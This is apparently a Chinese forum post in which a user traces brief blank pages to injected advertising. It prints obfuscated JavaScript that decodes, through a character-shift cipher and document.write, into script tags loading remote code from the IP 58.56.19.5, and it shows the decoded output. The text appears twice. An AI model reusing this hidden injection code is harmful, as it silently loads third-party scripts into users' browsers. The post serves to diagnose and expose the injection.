最近打开网页经常出现突然空白的情况,然后过了大约1s又跳转到要打开的网页
然后新发现了下面的代码
var d="=iunm?=ifbe?=mjol!sfm>#tuzmftiffu#!uzqf>#ufyu0dtt#!isfg>#iuuq;0069/67/2:/6;9103/dtt#?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0069/67/2:/6;910d/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0069/67/2:/6;9103/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?wbs!q>#iuuq;0069/67/2:/6;910b0t@beje>311751'uddb>ckB2N{FyOEJzOkR1N{h>'vsjq>2:15365343't";function i(_,__){_+=__;var $="";for(var u=0;u<_.length;u++){var r=_.charCodeAt(u);$+=String.fromCharCode(r-1);}return $;} var c="qpsu>1'fqpsu>1'psmv>bIS1dEpwM4embXKwMnOwcT9>'tqje>21:4788662'bsfb>2'ut>252168:294'bpsmv>bIS1dEpwM{V5MkV3MkF6MkV7PEBwNkBxOkRxMx>>'q2bsn>461'q3bsn>711'q4bsn>26'q5bsn>5'q6bsn>4'q7bsn>2'bqqe>1'ibtDpvou>1'ibtXijufVtfs>1#<=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op!pompbe>#joju)q*#!pocfgpsfvompbe>#ttu)*#?=0cpez?=0iunm?";document.write(i(d,c));
解码后是往网页里面写的下面几个脚本
i(d,c)
"<html><head><link rel="stylesheet" type="text/css" href="http://58.56.19.5:80/2.css"><script type="text/Javascript" src="http://58.56.19.5:80/c.js"></script><script type="text/Javascript" src="http://58.56.19.5:80/2.js"></script><script type="text/Javascript">var p="http://58.56.19.5:80/a/s?adid=200640&tcca=bjA1MzExNDIyNjQ0Mzg=&urip=1904254…2arm=600&p3arm=15&p4arm=4&p5arm=3&p6arm=1&appd=0&hasCount=0&hasWhiteUser=0";</script></head><body id="b" rightMargin=0 topMargin=0 leftMargin=0 scroll=no Onload="init(p)" Onbeforeunload="sst()"></body></html>"
http://58.56.19.5/2.js
http://58.56.19.5/c.js
运行 shows();
嵌入下面这个广告
http://58.56.19.5/200640/
然后新发现了下面的代码
var d="=iunm?=ifbe?=mjol!sfm>#tuzmftiffu#!uzqf>#ufyu0dtt#!isfg>#iuuq;0069/67/2:/6;9103/dtt#?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0069/67/2:/6;910d/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0069/67/2:/6;9103/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?wbs!q>#iuuq;0069/67/2:/6;910b0t@beje>311751'uddb>ckB2N{FyOEJzOkR1N{h>'vsjq>2:15365343't";function i(_,__){_+=__;var $="";for(var u=0;u<_.length;u++){var r=_.charCodeAt(u);$+=String.fromCharCode(r-1);}return $;} var c="qpsu>1'fqpsu>1'psmv>bIS1dEpwM4embXKwMnOwcT9>'tqje>21:4788662'bsfb>2'ut>252168:294'bpsmv>bIS1dEpwM{V5MkV3MkF6MkV7PEBwNkBxOkRxMx>>'q2bsn>461'q3bsn>711'q4bsn>26'q5bsn>5'q6bsn>4'q7bsn>2'bqqe>1'ibtDpvou>1'ibtXijufVtfs>1#<=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op!pompbe>#joju)q*#!pocfgpsfvompbe>#ttu)*#?=0cpez?=0iunm?";document.write(i(d,c));
解码后是往网页里面写的下面几个脚本
i(d,c)
"<html><head><link rel="stylesheet" type="text/css" href="http://58.56.19.5:80/2.css"><script type="text/Javascript" src="http://58.56.19.5:80/c.js"></script><script type="text/Javascript" src="http://58.56.19.5:80/2.js"></script><script type="text/Javascript">var p="http://58.56.19.5:80/a/s?adid=200640&tcca=bjA1MzExNDIyNjQ0Mzg=&urip=1904254…2arm=600&p3arm=15&p4arm=4&p5arm=3&p6arm=1&appd=0&hasCount=0&hasWhiteUser=0";</script></head><body id="b" rightMargin=0 topMargin=0 leftMargin=0 scroll=no Onload="init(p)" Onbeforeunload="sst()"></body></html>"
http://58.56.19.5/2.js
http://58.56.19.5/c.js
运行 shows();
嵌入下面这个广告
http://58.56.19.5/200640/
1
Select Language